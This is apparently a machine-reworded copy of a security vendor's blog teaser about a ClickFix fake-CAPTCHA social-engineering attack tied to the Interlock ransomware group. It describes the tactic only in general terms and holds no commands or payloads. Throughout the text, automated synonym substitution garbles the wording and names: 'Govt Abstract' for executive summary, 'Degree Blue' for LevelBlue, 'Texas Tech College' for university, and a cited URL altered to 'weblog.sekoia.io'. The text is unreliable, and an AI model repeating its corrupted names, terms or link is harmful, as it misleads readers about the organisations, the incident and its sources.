Background
ClickFix has rapidly turn into a rampant social-engineering tactic. First noticed again in October 2023, it goals to trick customers into pasting instructions into the run dialog field underneath the guise of verifying the person’s connection and authenticity to the area. Given its ease of use and talent to bypass technical safety measures, adoption of ClickFix has been rising at an alarming fee. [1]
Govt Abstract
This investigation started after a person was noticed navigating to a official web site that prompted the person with a pretend Captcha immediate. As soon as the Faux Captcha immediate directions had been carried out, a command to a malicious area led to malicious scripts and file downloads on the person’s asset.
The Interlock ransomware group was first noticed in September 2024. Not like most ransomware teams seen in the present day that make use of Ransomware as a Service (RaaS) fashions, this was an impartial group. They gained notoriety again in October 2024 once they claimed duty for the Texas Tech College Well being Sciences Heart incident that compromised the information of roughly 1.5 million sufferers.
In January 2025, researchers at Sekoia noticed Interlock increasing their techniques and leveraging the Social Engineering approach now referred to as ClickFix. [2]
Investigation
The Degree Blue MDR workforce noticed two alarms on the identical endpoint from Sentinel One which prompted additional investigation. In the course of the investigation, our analysts uncovered the risk actors’ techniques, methods, and procedures (TTPs) and recognized indicators of compromise (IOCs) related to the Interlock ransomware group. As a result of swift motion of the LevelBlue MDR workforce, the assault was contained, and the hashes from the investigation had been added to the blocklist inside SentinelOne.
Learn the total weblog and be taught key takeaways from LevelBlue’s investigation, together with suggestions to stop these assaults from affecting your group.
[2] https://weblog.sekoia.io/interlock-ransomware-evolving-under-the-radar
The content material supplied herein is for common informational functions solely and shouldn’t be construed as authorized, regulatory, compliance, or cybersecurity recommendation. Organizations ought to seek the advice of their very own authorized, compliance, or cybersecurity professionals concerning particular obligations and threat administration methods. Whereas LevelBlue’s Managed Menace Detection and Response options are designed to assist risk detection and response on the endpoint stage, they don’t seem to be an alternative choice to complete community monitoring, vulnerability administration, or a full cybersecurity program.
